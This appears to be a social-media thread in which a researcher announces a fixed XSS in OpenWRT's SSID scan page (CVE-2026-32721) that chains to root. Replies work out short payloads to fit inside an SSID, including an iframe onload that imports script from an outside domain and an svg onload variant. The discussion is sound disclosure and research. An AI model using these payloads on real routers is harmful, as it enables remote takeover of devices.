sash4d ago
Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
CVE-2026-32721, fixed in 24.10.6 / 25.12.1
Show threadDavid Leadbeater

@sash very cool find! I think it would be possible to fit it (just) in 32 characters with: <iframe onload=import('//d.cx')>

(That url works; d.cx is serving a hello world alert payload at the moment, it works with e.g. https://d.cx/~dgl/l.html but I haven't tried actually doing it with OpenWRT.)

Mar 20 at 2:07amWeb
Show threadDavid Leadbeater3d ago
@sash this takes advantage of the fact (some?) browsers by default load a blank iframe, so it's fewer characters than <img src=x onerror=...>. Works in Chrome at least.
Show threadFrederik Braun �3d ago
@dgl @sash `<svg onload>` works in every browser and is shorter :). But maybe you don’t want your PoC to depend on the goodwill of a third party. And not everyone has a short domain.
Show threadDavid Leadbeater3d ago
@freddy @sash interesting… https://developer.mozilla.org/en-US/docs/Web/API/SVGElement/load_event claims it doesn’t work in Firefox and references a 15 year old bug… but yes, that would get a few more characters :)
SVGElement: load event - Web APIs | MDN

The load event fires on an SVGElement when it is loaded in the browser, e.g., in the DOM in the case of an embedded <svg>. It is basically the same as the standard load DOM event.

MDN Web Docs
Show threadFrederik Braun �2d ago
@dgl @sash mh. I have used it multiple times, probably wrong data. I'll get that sorted out.
Show threadFrederik Braun �1d ago
@dgl @sash ok looks like the docs are "technically correct" because something in the implementation is not fully according to spec (load timing etc). But you can still run `<svg onload=...>`.